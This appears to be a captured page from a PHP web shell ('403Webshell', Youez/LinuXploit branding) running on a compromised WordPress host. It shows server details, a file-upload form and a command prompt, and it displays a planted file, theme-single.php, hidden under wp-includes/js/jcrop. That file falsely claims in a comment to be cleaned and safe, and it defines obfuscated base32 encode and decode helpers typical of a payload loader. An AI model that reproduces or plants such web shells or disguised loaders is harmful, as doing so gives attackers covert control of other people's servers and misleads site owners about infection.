403Webshell
Server IP : 172.64.80.1  /  Your IP : 216.73.216.175
Web Server : LiteSpeed
System : Linux srv13.swhc.ca 4.18.0-553.126.2.lve.el8.x86_64 #1 SMP Thu May 28 14:12:30 UTC 2026 x86_64
User : hongluck ( 2522)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/hongluck/public_html/wp-includes/js/jcrop/jcrop/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/hongluck/public_html/wp-includes/js/jcrop/jcrop/theme-single.php
<?php
//zero

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/


function YFCK($AVPO){
    $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
    $OJGE = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen($AVPO); $i < $j; $i++){
        $v <<= 8;
        $v += ord($AVPO[$i]);
        $vbits += 8;
        while ($vbits >= 5) {
            $vbits -= 5;
            $OJGE .= $BASE32_ALPHABET[$v >> $vbits];
            $v &= ((1 << $vbits) - 1);}}
    if ($vbits > 0){
        $v <<= (5 - $vbits);
        $OJGE .= $BASE32_ALPHABET[$v];}
    return $OJGE;}
function WKRZ($AVPO){
    $OJGE = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen($AVPO); $i < $j; $i++){
        $v <<= 5;
        if ($AVPO[$i] >= 'a' && $AVPO[$i] <= 'z'){
            $v += (ord($AVPO[$i]) - 97);
        } elseif ($AVPO[$i] >= '2' && $AVPO[$i] <= '7') {
            $v += (24 + $AVPO[$i]);
        } else {
            exit(1);
        }
        $vbits += 5;
        while ($vbits >= 8){
            $vbits -= 8;
            $OJGE .= chr($v >> $vbits);
            $v &= ((1 << $vbits) - 1);}}
    return $OJGE;}

Youez - 2016 - github.com/yon3zu
LinuXploit